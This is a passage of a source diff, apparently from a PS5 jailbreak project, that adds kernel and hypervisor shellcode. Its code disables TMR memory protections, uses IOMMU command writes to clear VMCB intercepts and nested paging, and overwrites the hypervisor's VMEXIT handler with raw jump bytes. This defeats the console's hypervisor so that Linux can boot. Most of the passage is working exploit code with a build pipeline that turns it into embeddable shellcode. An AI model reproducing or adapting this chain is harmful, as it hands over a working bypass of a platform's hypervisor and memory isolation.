"=d"(edx) + : "a"(1)); + + cpu_id = (ebx >> 24) & 0xFF; + + // We point to a location after the main linux boot code + // Each CPU should have a different location + uintptr_t new_rsp = + (uintptr_t)hv_base_rsp + ((uint64_t)(cpu_id)*hv_stack_size); + + // WARNING: This invalidates current local variables + __asm__ volatile("movq %0, %%rsp \n\t" + "movq %%rsp, %%rbp \n\t" + : + : "r"(new_rsp) + : "rsp", "rbp", "memory"); + + entry(); +} \ No newline at end of file diff --git a/shellcode_hypervisor/main.h b/shellcode_hypervisor/main.h new file mode 100644 index 0000000..34e7b5b --- /dev/null +++ b/shellcode_hypervisor/main.h @@ -0,0 +1,3 @@ +#include "shellcode_hypervisor_args.h" +#include +#include diff --git a/shellcode_hypervisor/shellcode_hypervisor_args.h b/shellcode_hypervisor/shellcode_hypervisor_args.h new file mode 100644 index 0000000..a3a89e6 --- /dev/null +++ b/shellcode_hypervisor/shellcode_hypervisor_args.h @@ -0,0 +1,9 @@ +// This file is shared between kernel shellcode and hypervisor shellcode + +#include + +typedef struct { + uint64_t bzimage_pa; // Already relocated by Kernel shellcode + uint64_t initrd_pa; // Already relocated by Kernel shellcode + uint64_t linux_info_pa; // Already relocated by Kernel shellcode +} shellcode_hypervisor_args; \ No newline at end of file diff --git a/shellcode_hypervisor/utils.c b/shellcode_hypervisor/utils.c new file mode 100644 index 0000000..2c0d2d7 --- /dev/null +++ b/shellcode_hypervisor/utils.c @@ -0,0 +1,114 @@ +#include "utils.h" +#include "shellcode_hypervisor_args.h" +#include + +extern shellcode_hypervisor_args args; + +__attribute__((noinline, optimize("O0"))) uint32_t putc_uart(uint8_t tx_byte) { + volatile uint32_t *uart_tx = 0xc1010104ULL; + volatile uint32_t *uart_busy = 0xc101010cULL; + uint64_t timeout = 0xFFFFFFFF; + do { + timeout--; + if (timeout == 0) + break; + } while (((*uart_busy) & 0x20) == 0); + + if (timeout == 0) + return -1; + + *uart_tx = (uint32_t)tx_byte & 0xFF; + return 0; +} + +// Variable for val to hex +uint8_t hex_val[17]; + +__attribute__((noinline, optimize("O0"))) uint8_t * +u64_to_hex_custom(uint64_t val, uint8_t *dest) { + + const uint8_t hex_chars[] = "0123456789abcdef"; + dest[16] = '\0'; + + for (int i = 15; i >= 0; i--) { + dest[i] = hex_chars[val & 0xf]; + val >>= 4; + } + return dest; +} + +__attribute__((noinline, optimize("O0"))) int printf(const uint8_t *msg) { + uint32_t max = 255; + int ret = 0; + + for (int i = 0; i < 255; i++) { + if (msg[i] == '\0') { + break; + } + if (msg[i] == '\n') { + putc_uart('\r'); + } + ret = putc_uart(msg[i]); + } + + return ret; +} + +__attribute__((noinline, optimize("O0"))) void memcpy(void *dest, void *src, + uint64_t len) { + uint8_t *d = (uint8_t *)dest; + const uint8_t *s = (const uint8_t *)src; + for (uint64_t i = 0; i < len; i++) { + d[i] = s[i]; + } +} + +__attribute__((noinline, optimize("O0"))) char *strcpy(char *dest, + const char *src) { + char *d = dest; + while ((*d++ = *src++)) { + } + return dest; +} + +__attribute__((noinline, optimize("O0"))) void *memset(void *s, int c, + uint64_t n) { + unsigned char *p = (unsigned char *)s; + while (n--) { + *p++ = (unsigned char)c; + } + return s; +} + +void disable_intr(void) { __asm__ __volatile__("cli" : : : "memory"); } + +void halt(void) { __asm__ __volatile__("hlt"); } + +uint64_t rdmsr(uint32_t msr) { + uint32_t low, high; + __asm__ __volatile__("rdmsr" : "=a"(low), "=d"(high) : "c"(msr)); + return ((uint64_t)high << 32) | low; +} + +void wrmsr(uint32_t msr, uint64_t val) { + uint32_t low = val & 0xFFFFFFFF; + uint32_t high = val >> 32; + __asm__ __volatile__("wrmsr" : : "a"(low), "d"(high), "c"(msr)); +} + +// Map FreeBSD atomic_add_32 to GCC builtin +void atomic_add_32(volatile uint32_t *p, uint32_t v) { + __sync_fetch_and_add(p, v); +} + +// Map FreeBSD atomic_cmpset_32 to GCC builtin +int atomic_cmpset_32(volatile uint32_t *dst, uint32_t exp, uint32_t src) { + return __sync_bool_compare_and_swap(dst, exp, src); +} + +uint8_t get_cpu(void) { + uint32_t eax, ebx, ecx, edx; + __get_cpuid(1, &eax, &ebx, &ecx, &edx); + uint8_t cpu_id = (ebx >> 24) & 0xFF; + return cpu_id; +} \ No newline at end of file diff --git a/shellcode_hypervisor/utils.h b/shellcode_hypervisor/utils.h new file mode 100644 index 0000000..0c25473 --- /dev/null +++ b/shellcode_hypervisor/utils.h @@ -0,0 +1,28 @@ +#ifndef UTILS_H +#define UTILS_H + +#include + +uint32_t putc_uart(uint8_t tx_byte); +int printf(const uint8_t *msg); +uint8_t *u64_to_hex_custom(uint64_t val, uint8_t *dest); + +extern uint8_t hex_val[17]; + +inline int print_val64(uint64_t val) { + return printf(u64_to_hex_custom(val, hex_val)); +} + +void memcpy(void *dest, void *src, uint64_t len); +char *strcpy(char *dest, const char *src); +void *memset(void *s, int c, uint64_t n); + +void disable_intr(void); +void halt(void); +uint64_t rdmsr(uint32_t msr); +void wrmsr(uint32_t msr, uint64_t val); +void atomic_add_32(volatile uint32_t *p, uint32_t v); +int atomic_cmpset_32(volatile uint32_t *dst, uint32_t exp, uint32_t src); +uint8_t get_cpu(void); + +#endif \ No newline at end of file diff --git a/shellcode_kernel/Makefile b/shellcode_kernel/Makefile new file mode 100644 index 0000000..8b8fdb0 --- /dev/null +++ b/shellcode_kernel/Makefile @@ -0,0 +1,33 @@ +ifndef PS5_PAYLOAD_SDK + PS5_PAYLOAD_SDK = /opt/ps5-payload-sdk/ +endif + + +CC = gcc +LD = ld +CFLAGS = -O2 -fno-stack-protector -ffreestanding -nostdlib -I$(PS5_PAYLOAD_SDK)/target/include +LDFLAGS = -T linker.ld +TARGET = shellcode_kernel.elf +TEXT_BIN = shellcode_text.bin + +SRC = main.c utils.c kernel_code.c +OBJ = $(SRC:.c=.o) + +dump = shellcode_kernel.h + +all: $(dump) + +$(TARGET): $(OBJ) + $(CC) $(CFLAGS) $(LDFLAGS) $(OBJ) -o $(TARGET) + +%.o: %.c + $(CC) $(CFLAGS) -c $< -o $@ + +$(TEXT_BIN): $(TARGET) + objcopy -O binary -j .text $(TARGET) $(TEXT_BIN) + +clean: + rm -f $(OBJ) $(TARGET) $(TEXT_BIN) $(dump) + +$(dump): $(TEXT_BIN) + python3 bin_to_c_kernel.py $(TEXT_BIN) \ No newline at end of file diff --git a/shellcode_kernel/bin_to_c_kernel.py b/shellcode_kernel/bin_to_c_kernel.py new file mode 100644 index 0000000..9bf7e88 --- /dev/null +++ b/shellcode_kernel/bin_to_c_kernel.py @@ -0,0 +1,48 @@ +import sys +import os + +def create_shellcode_header(input_file_text): + if not os.path.exists(input_file_text): + print(f"Error: {input_file_text} not found.") + return + + # Read binary data_text + with open(input_file_text, "rb") as f: + data_text = f.read() + + # Hardcoded output name + output_name = "shellcode_kernel.h" + array_name_text = "shellcode_kernel_text" + + with open(output_name, "w") as f: + f.write(f"// Generated from {input_file_text}\n") + f.write(f"#ifndef SHELLCODE_KERNEL_H\n") + f.write(f"#define SHELLCODE_KERNEL_H\n\n") + f.write(f"#include \n\n") + + f.write(f"#include \"shellcode_kernel_args.h\"\n\n") + + f.write(f"uint8_t {array_name_text}[] = {{\n ") + + for i, byte in enumerate(data_text): + f.write(f"0x{byte:02X}") + + if i < len(data_text) - 1: + f.write(", ") + + # New line every 12 bytes + if (i + 1) % 12 == 0: + f.write("\n ") + + f.write(f"\n}};\n\n") + f.write(f"uint64_t {array_name_text}_len = {len(data_text)};\n\n") + + f.write(f"#endif // SHELLCODE_KERNEL_H\n") + + print(f"Done! Created {output_name} ({len(data_text)} bytes)") + +if __name__ == "__main__": + if len(sys.argv) < 2: + print("Usage: python bin_to_c_kernel.py ") + else: + create_shellcode_header(sys.argv[1]) \ No newline at end of file diff --git a/shellcode_kernel/kernel_code.c b/shellcode_kernel/kernel_code.c new file mode 100644 index 0000000..fcdffbd --- /dev/null +++ b/shellcode_kernel/kernel_code.c @@ -0,0 +1,184 @@ +#include "kernel_code.h" +#include "../include/config.h" +#include "../shellcode_hypervisor/shellcode_hypervisor.h" +#include "shellcode_kernel_args.h" +#include "utils.h" + +#define DIG1TRANSMITTERCONTROL 0x4c + +#define TRANSMITTER_CONTROL_ENABLE 1 +#define TRANSMITTER_CONTROL_SET_VOLTAGE_AND_PREEMPASIS 11 + +int (*transmitter_control)(int cmd, void *control) = NULL; // Filled by main.c +int (*mp3_initialize)(int vmid) = NULL; // Filled by main.c +int (*mp3_invoke)(int cmd_id, void *req, void *rsp) = NULL; // Filled by main.c + +uint64_t g_vbios; // Filled by main.c + +typedef struct { + uint8_t lanenum; + uint32_t rate; + uint32_t pad; + uint32_t lane_setting_1; + uint32_t lane_setting_2; +} transmitter_args; + +struct dig_transmitter_control_parameters_v1_6 { + uint8_t phyid; + uint8_t action; + union { + uint8_t digmode; + uint8_t dplaneset; + } mode_laneset; + uint8_t lanenum; + uint32_t symclk_10khz; + uint8_t hpdsel; + uint8_t digfe_sel; + uint8_t connobj_id; + uint8_t reserved; + uint32_t reserved1; +}; + +struct linux_info { + uintptr_t bzimage; + size_t bzimage_size; + uintptr_t initrd; + size_t initrd_size; + size_t vram_size; + char cmdline[2048]; +}; + +static struct linux_info info; + +static int mp3_req[1281], mp3_rsp[1282]; + +static inline void stac(void) { __asm__ volatile("stac" : : : "cc"); } + +static inline void clac(void) { __asm__ volatile("clac" : : : "cc"); } + +static inline uint64_t vmmcall(uint64_t nr, uint64_t a0, uint64_t a1, + uint64_t a2) { + uint64_t ret; + __asm__ volatile("vmmcall" + : "=a"(ret) + : "a"(nr), "b"(a0), "c"(a1), "d"(a2) + : "memory"); + return ret; +} + +static int dp_enable_link_phy(int lanenum, int linkrate) { + struct dig_transmitter_control_parameters_v1_6 params = {}; + params.phyid = 0; + params.action = TRANSMITTER_CONTROL_ENABLE; + params.mode_laneset.digmode = 0; + params.lanenum = lanenum; + params.symclk_10khz = 27000 * linkrate / 10; + params.hpdsel = 0; + params.digfe_sel = 0; + params.connobj_id = 0; + + return transmitter_control(DIG1TRANSMITTERCONTROL, ¶ms); +} + +static int mp3_set_hdcp_packet(int be, int mode) { + mp3_req[0] = be; + mp3_req[1] = mode; + return mp3_invoke(21, mp3_req, mp3_rsp); +} + +static int mp3_enable_output(int be, int mode) { + mp3_req[0] = be; + mp3_req[1] = mode; + return mp3_invoke(22, mp3_req, mp3_rsp); +} + +static void patch_hv(void) { + + // Install identity map for HV + // HV Shellcode 1 it's updating CR3 + uint64_t identity_cr3 = cave_hv_paging; // P, RW, US=0 + uint64_t identity_pml4_0 = + identity_cr3 + + 0x1003ULL; // P, RW, US=0 - 512GB // offset 0 +0x1000 from PML4 + uint64_t l40_l3_addr = PAGE_PA(identity_pml4_0); // addr PML4[0] + uint64_t identity_pml40_l3[] = { + 0x0000000000000083, // P, RW, US=0 - 0 GB to 1 GB + 0x0000000040000083, // P, RW, US=0 - 1 GB to 2 GB + 0x0000000080000083, // P, RW, US=0 - 3 GB to 3 GB + 0x00000000C0000083, // P, RW, US=0 - 4 GB to 4 GB + 0x0000000100000083 // P, RW, US=0 - 5 GB to 6 GB --> Our paging structure + }; + uint64_t l3_size = sizeof(identity_pml40_l3) / sizeof(identity_pml40_l3[0]); + + // Create the map in memory + *(uint64_t *)PHYS_TO_DMAP(identity_cr3) = identity_pml4_0; + for (uint64_t i = 0; i < l3_size; i++) { + *(uint64_t *)PHYS_TO_DMAP(l40_l3_addr + i * 8) = identity_pml40_l3[i]; + } + + // Install hv_shellcode 2 + uint64_t hv_shellcode = cave_hv; + memcpy((void *)PHYS_TO_DMAP(hv_shellcode), shellcode_hypervisor, + shellcode_hypervisor_len); + + // Jump to shellcode final identity mapping + uint8_t shellcode_jmp[] = { + 0x48, 0xC7, 0xC0, 0x00, 0x6F, 0x80, 0x62, // mov rax, 0x62806f00 + 0xFF, 0xE0, 0xC3, 0xC3, 0xC3, 0xC3, 0xC3, // jmp rax + 0xC3, 0xC3}; + + // Update code cave in hv 1:1 region + *(uint32_t *)(&shellcode_jmp[3]) = (uint32_t)args.hv_code_cave_pa; + + // Just patch the VMEXIT handler directly, avoiding all checks (0x6282b45d) + memcpy(PHYS_TO_DMAP(args.hv_handle_vmexit_pa), shellcode_jmp, + sizeof(shellcode_jmp)); + + uint8_t shellcode_identity_and_jmp[] = { + 0x48, 0xB8, 0x00, 0x00, 0x00, + 0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100000000 + 0x0F, 0x22, 0xD8, // mov cr3, rax + 0x48, 0xB8, 0x00, 0x30, 0x00, + 0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100003000 + 0xFF, 0xE0 // jmp rax + }; + + // Update CR3 PA (from config) + *(uint64_t *)(&shellcode_identity_and_jmp[2]) = cave_hv_paging; + // Update HV shellcode cave + *(uint64_t *)(&shellcode_identity_and_jmp[15]) = cave_hv_code; + + // Install shellcode 1 to update CR3 and jump to main HV shellcode + memcpy(PHYS_TO_DMAP(args.hv_code_cave_pa), shellcode_identity_and_jmp, + sizeof(shellcode_identity_and_jmp)); +} + +void boot_linux(void) { + + patch_hv(); + + memcpy((void *)PHYS_TO_DMAP(0xC0000), g_vbios, 0x10000); + + // Enable DP phys link. + dp_enable_link_phy(4, 30); + + // Initialize hdcp in mp3. + mp3_initialize(0); + mp3_set_hdcp_packet(0, 1); + mp3_enable_output(0, 1); + + // Copy bzImage and initrd into contiguous memory. + memcpy(&info, (void *)args.linux_info_va, sizeof(struct linux_info)); + + uintptr_t bzimage = info.bzimage; // Kernel wrote the VA here + uintptr_t initrd = info.initrd; // Kernel wrote the VA here + + info.bzimage = cave_bzImage; + info.initrd = cave_bzImage + ALIGN_UP(info.bzimage_size, PAGE_SIZE); + + memcpy((void *)PHYS_TO_DMAP(cave_linux_info), &info, + sizeof(struct linux_info)); + memcpy((void *)PHYS_TO_DMAP(info.bzimage), (void *)bzimage, + info.bzimage_size); + memcpy((void *)PHYS_TO_DMAP(info.initrd), (void *)initrd, info.initrd_size); +} diff --git a/shellcode_kernel/kernel_code.h b/shellcode_kernel/kernel_code.h new file mode 100644 index 0000000..72f9378 --- /dev/null +++ b/shellcode_kernel/kernel_code.h @@ -0,0 +1,24 @@ +#ifndef KERNEL_CODE_H +#define KERNEL_CODE_H + +#include + +#define cave 0x100000000ULL +#define cave_hv_paging cave +#define cave_hv cave_hv_paging + 0x3000 +#define cave_linux cave_hv + 0x2000 + +#define PAGE_SIZE 4096 +#define ALIGN_UP(size, align) (((size) + (align) - 1) & ~((align) - 1)) + +static int dp_enable_link_phy(int lanenum, int linkrate); +static void patch_hv(void); +void boot_linux(void); + +extern int (*transmitter_control)(int cmd, void *control); +extern int (*mp3_initialize)(int vmid); +extern int (*mp3_invoke)(int cmd_id, void *req, void *rsp); + +extern uint64_t g_vbios; // for main.c + +#endif \ No newline at end of file diff --git a/shellcode_kernel/linker.ld b/shellcode_kernel/linker.ld new file mode 100644 index 0000000..269ff56 --- /dev/null +++ b/shellcode_kernel/linker.ld @@ -0,0 +1,18 @@ +/* linker.ld */ +ENTRY(main) + +SECTIONS +{ + . = 0x1000; /* 0x1000 to avoid warnings from linker */ + .text : + { + *(.entry_point) + *(.text) + *(.text.*) + *(.data) + *(.data.*) + *(.rodata*) + *(.bss) + *(.bss.*) + } +} \ No newline at end of file diff --git a/shellcode_kernel/main.c b/shellcode_kernel/main.c new file mode 100644 index 0000000..98b9d68 --- /dev/null +++ b/shellcode_kernel/main.c @@ -0,0 +1,296 @@ +#include "main.h" +#include "kernel_code.h" +#include "utils.h" +#include +typedef int32_t size_t; +typedef int32_t cpusetid_t; +typedef int cpuwhich_t; +typedef int cpulevel_t; +typedef int32_t id_t; +#include +#include + +#define MSR_EFER 0xC0000080 + +shellcode_kernel_args args = { + .fw_version = 0xDEADBEEF, .fun_printf = 0x0, .vmcb = {0}}; + +// We are being called instead of AcpiSetFirmwareWakingVector from +// acpi_wakeup_machdep +__attribute__((section(".entry_point"))) uint32_t main(uint64_t add1, + uint64_t add2) { + + // We will do main checks on .text only with a reference to .data to avoid + // fixed offsets first After NPTs are disabled, we can continue nornmally + // using all the variables in .data that are embedded in shellcode + volatile shellcode_kernel_args *args_ptr = + (volatile shellcode_kernel_args + *)0x11AA11AA11AA11AA; // To be replaced with proper address in .kdata + // by loader + + // "Hide" the pointer from the optimizer + __asm__ volatile("" : "+r"(args_ptr)); + + // We don't have required information - Abort + if ((args_ptr->fun_printf & 0xFFFF) == 0) { + goto out; + } + + // Activate UART on Kernel + uint32_t *uart_va = (uint32_t *)(args_ptr->dmap_base + 0xC0115110ULL); + *uart_va &= ~0x200; + uint32_t *override_char_va = (uint32_t *)args_ptr->kernel_uart_override; + *override_char_va = 0x0; + + uint64_t iommu_cb2_pa = + ((uint64_t(*)(uint64_t))args_ptr->fun_va_to_pa)(args_ptr->iommu_cb2_va); + uint64_t iommu_cb3_pa = + ((uint64_t(*)(uint64_t))args_ptr->fun_va_to_pa)(args_ptr->iommu_cb3_va); + uint64_t iommu_eb_pa = + ((uint64_t(*)(uint64_t))args_ptr->fun_va_to_pa)(args_ptr->iommu_eb_va); + + uint64_t unk; + int n_devices; + + // Reconfigure IOMMU calling the HV + int ret = ((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t, + int *))args_ptr->fun_hv_iommu_set_buffers)( + iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, &unk, &n_devices); + + if (ret != 0) { + putc_uart(args_ptr->dmap_base, 'I'); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'U'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 's'); + putc_uart(args_ptr->dmap_base, 'b'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'X'); + putc_uart(args_ptr->dmap_base, '\n'); + goto out; + } + + // Wait for completion + ret = ((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)(); + + if (ret == 0) { + + putc_uart(args_ptr->dmap_base, 'I'); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'U'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 's'); + putc_uart(args_ptr->dmap_base, 'b'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, 'K'); + putc_uart(args_ptr->dmap_base, '\n'); + + // Allow R/W on HV and Kernel area + if (tmr_disable(args_ptr->dmap_base)) { + + putc_uart(args_ptr->dmap_base, 'T'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'R'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'X'); + putc_uart(args_ptr->dmap_base, '\n'); + + goto out; + } + + putc_uart(args_ptr->dmap_base, 'T'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'R'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, 'K'); + putc_uart(args_ptr->dmap_base, '\n'); + + // Patch HV + patch_vmcb(args_ptr); + + putc_uart(args_ptr->dmap_base, 'V'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'C'); + putc_uart(args_ptr->dmap_base, 'B'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, 'K'); + putc_uart(args_ptr->dmap_base, '\n'); + + // Re-do this to force a VMEXIT without HV injecting faults + ((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t, + int *))args_ptr->fun_hv_iommu_set_buffers)( + iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, &unk, &n_devices); + ((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)(); + + putc_uart(args_ptr->dmap_base, 'B'); + putc_uart(args_ptr->dmap_base, 'a'); + putc_uart(args_ptr->dmap_base, 'c'); + putc_uart(args_ptr->dmap_base, 'k'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'f'); + putc_uart(args_ptr->dmap_base, 'r'); + putc_uart(args_ptr->dmap_base, 'o'); + putc_uart(args_ptr->dmap_base, 'm'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'H'); + putc_uart(args_ptr->dmap_base, 'V'); + putc_uart(args_ptr->dmap_base, '\n'); + + // We can now initiate the global args variable and use it, as NPTs are + // disabled + init_global_pointers(args_ptr); + + printf("HV_Defeat: we should be ready for Linux part\n"); + + boot_linux(); + printf("Linux prepared OK\n"); + + // Activate HV UART - Not really needed but good for debugging + // *(uint32_t*)PHYS_TO_DMAP(args.hv_uart_override_pa) = 0x0; + + printf("Calling smp_rendezvous to exit all cores to HV with ptr: %016lx\n", + (uint64_t)vmmcall_dummy); + printf("Good Bye VM :)\n"); + + smp_rendezvous(smp_no_rendevous_barrier, vmmcall_dummy, + smp_no_rendevous_barrier, NULL); + + printf("We shouldn't be here :(\n"); + } else { + putc_uart(args_ptr->dmap_base, 'I'); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'M'); + putc_uart(args_ptr->dmap_base, 'U'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 's'); + putc_uart(args_ptr->dmap_base, 'b'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'N'); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, ' '); + putc_uart(args_ptr->dmap_base, 'O'); + putc_uart(args_ptr->dmap_base, 'K'); + putc_uart(args_ptr->dmap_base, '\n'); + } + +out: + return 0; +} + +__attribute__((noinline, optimize("O0"), naked)) void vmmcall_dummy(void) { + __asm__ volatile("mov $0x1, %rax \n" + "vmmcall \n" + "ret \n"); +} + +void halt(void) { __asm__ __volatile__("hlt"); } + +// Submit a single 16-byte command and wait for completion +__attribute__((noinline, optimize("O0"))) void +iommu_submit_cmd(shellcode_kernel_args *args_ptr, uint64_t *cmd) { + // Read the offset of current tail of command list + uint64_t curr_tail = *( + (uint64_t *)args_ptr->iommu_mmio_va + + IOMMU_MMIO_CB_TAIL / + 8); // Offset in IOMMU Command Buffer - Downscale the size of the ptr + uint64_t next_tail = (curr_tail + IOMMU_CMD_ENTRY_SIZE) & + IOMMU_CB_MASK; // Offset in IOMMU Command Buffer + + // We write the command in the current empty entry + uint64_t *cmd_buffer = + args_ptr->iommu_cb2_va + curr_tail / 8; // Downscale the size of the ptr + // Copy 0x10 bytes (CMD Size) + cmd_buffer[0] = cmd[0]; + cmd_buffer[1] = cmd[1]; + + __asm__ volatile("" : : : "memory"); // Prevent reordering + *((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8) = + next_tail; // Indicate the IOMMU that there is a CMD - Downscale the size + // of the ptr + + // Wait CMD processing completion - Head will be the Tail + while (*((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_HEAD / 8) != + *((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8)) + ; +} + +// Write 8 bytes to a physical address using IOMMU completion wait store +__attribute__((noinline, optimize("O0"))) void +iommu_write8_pa(shellcode_kernel_args *args_ptr, uint64_t pa, uint64_t val) { + uint32_t cmd[4] = {0}; + cmd[0] = (uint32_t)(pa & 0xFFFFFFF8) | 0x05; + cmd[1] = ((uint32_t)(pa >> 32) & 0xFFFFF) | 0x10000000; + cmd[2] = (uint32_t)(val); + cmd[3] = (uint32_t)(val >> 32); + iommu_submit_cmd(args_ptr, (uint64_t *)cmd); +} + +__attribute__((noinline, optimize("O0"))) void +patch_vmcb(shellcode_kernel_args *args_ptr) { + for (int i = 0; i < 16; i++) { + uint64_t pa = args_ptr->vmcb[i]; + // args_ptr->fun_printf("Patching core: %02d VMCB_PA: 0x%016lx\n", i, + // args_ptr->vmcb[i]); + iommu_write8_pa(args_ptr, pa + 0x00, + 0x0000000000000000ULL); // Clear all intercepts (R/W) to + // CR0-CR15 and DR0-DR15 + iommu_write8_pa(args_ptr, pa + 0x08, + 0x0004000000000000ULL); // Clear all intercepts of except. + // vectors but CPUID + iommu_write8_pa(args_ptr, pa + 0x10, + 0x000000000000000FULL); // Clear all except VMMCALL, VMLOAD, + // VMSAVE, VMRUN + iommu_write8_pa(args_ptr, pa + 0x58, + 0x0000000000000001ULL); // Guest ASID ... 1 ? + iommu_write8_pa(args_ptr, pa + 0x90, + 0x0000000000000000ULL); // Disable NP_ENABLE + } +} + +__attribute__((noinline, optimize("O0"))) uint32_t tmr_read(uint64_t dmap, + uint32_t addr) { + *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr; + return *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF); +} + +__attribute__((noinline, optimize("O0"))) void +tmr_write(uint64_t dmap, uint32_t addr, uint32_t val) { + *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr; + *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF) = val; +} + +// On 1.xx and 2.xx the HV is embedded in kernel area on TMR 16 +// On 3.xx and 4.xx there are multiple TMR protecting HV and Kernel +__attribute__((noinline, optimize("O0"))) int tmr_disable(uint64_t dmap) { + for (int i = 0; i < 24; i++) { + if (tmr_read(dmap, TMR_CONFIG(i)) != 0) { + tmr_write(dmap, TMR_CONFIG(i), 0); + if (tmr_read(dmap, TMR_CONFIG(i)) != 0) { + return -1; + } + } + } + return 0; +} + +void init_global_pointers(shellcode_kernel_args *args_ptr) { + + memcpy(&args, args_ptr, sizeof(args)); + + printf = args.fun_printf; + smp_rendezvous = args.fun_smp_rendezvous; + smp_no_rendevous_barrier = args.fun_smp_no_rendevous_barrier; + + transmitter_control = args.fun_transmitter_control; + mp3_initialize = args.fun_mp3_initialize; + mp3_invoke = args.fun_mp3_invoke; + g_vbios = args.g_vbios; +} \ No newline at end of file diff --git a/shellcode_kernel/main.h b/shellcode_kernel/main.h new file mode 100644 index 0000000..50295fd --- /dev/null +++ b/shellcode_kernel/main.h @@ -0,0 +1,71 @@ +#ifndef MAIN_H +#define MAIN_H +#include "shellcode_kernel_args.h" +#include +#include +#include +#include + +void (*printf)(const char *format, ...); +uint32_t (*AcpiSetFirmwareWakingVector)(uint64_t PhysicalAddress, + uint64_t PhysicalAddress64); +uint64_t (*kernel_va_to_pa)(uint64_t va); +uint32_t (*hv_iommu_set_buffers)(uint64_t cb2_pa, uint64_t cb3_pa, + uint64_t eb_pa, uint64_t unk, int *n_devices); +uint32_t (*hv_iommu_wait_completion)(void); +void (*smp_rendezvous)(void (*setup_func)(void *), void (*action_func)(void *), + void (*teardown_func)(void *), void *arg); +void (*smp_rendezvous_cpus)(cpuset_t map, void (*setup_func)(void *), + void (*action_func)(void *), + void (*teardown_func)(void *), void *arg); +void (*smp_no_rendevous_barrier)(void); + +// We are being called instead of AcpiSetFirmwareWakingVector from +// acpi_wakeup_machdep +uint32_t main(uint64_t add1, uint64_t add2); + +uint64_t rdmsr(uint32_t msr); + +// tmr via ecam b0d18f2 +#ifndef ECAM_B0D18F2 +#define ECAM_B0D18F2 (0xF0000000ULL + 0x18ULL * 0x8000 + 2 * 0x1000) +#define TMR_INDEX_OFF 0x80 +#define TMR_DATA_OFF 0x84 +#endif + +// tmr layout (hardware) +#define TMR_BASE(n) ((n) * 0x10 + 0x00) +#define TMR_LIMIT(n) ((n) * 0x10 + 0x04) +#define TMR_CONFIG(n) ((n) * 0x10 + 0x08) +#define TMR_REQUESTORS(n) ((n) * 0x10 + 0x0C) +#define TMR_CFG_PERMISSIVE 0x3F07 +#define MAX_TMR 22 +#define MAX_SAVED_TMRS 8 + +uint32_t tmr_read(uint64_t dmap, uint32_t addr); +void tmr_write(uint64_t dmap, uint32_t addr, uint32_t val); + +int tmr_relax(void); + +// Command buffer MMIO offsets +#define IOMMU_MMIO_CB_HEAD 0xa000 +#define IOMMU_MMIO_CB_TAIL 0xa008 + +// Queue constants +#define IOMMU_CB_SIZE 0x2000 +#define IOMMU_CB_MASK (IOMMU_CB_SIZE - 1) +#define IOMMU_CMD_ENTRY_SIZE 0x10 + +// Submit a single 16-byte command and wait for completion +void iommu_submit_cmd(shellcode_kernel_args *args_ptr, uint64_t *cmd); +// Write 8 bytes to a physical address using IOMMU completion wait store +void iommu_write8_pa(shellcode_kernel_args *args_ptr, uint64_t pa, + uint64_t val); + +void patch_vmcb(shellcode_kernel_args *args_ptr); + +#define NULL (void *)0 +void vmmcall_dummy(void); +void halt(void); + +#endif \ No newline at end of file diff --git a/shellcode_kernel/shellcode_kernel_args.h b/shellcode_kernel/shellcode_kernel_args.h new file mode 100644 index 0000000..5c2a525 --- /dev/null +++ b/shellcode_kernel/shellcode_kernel_args.h @@ -0,0 +1,37 @@ +// This file is shared between main payload and kernel shellcode +#ifndef SHELLCODE_KERNEL_ARGS_H +#define SHELLCODE_KERNEL_ARGS_H + +#include + +typedef struct { + uint32_t fw_version; + uint64_t ktext; + uint64_t kdata; + uint64_t dmap_base; + uint64_t fun_printf; + uint64_t fun_va_to_pa; + uint64_t fun_hv_iommu_set_buffers; + uint64_t fun_hv_iommu_wait_completion; + uint64_t 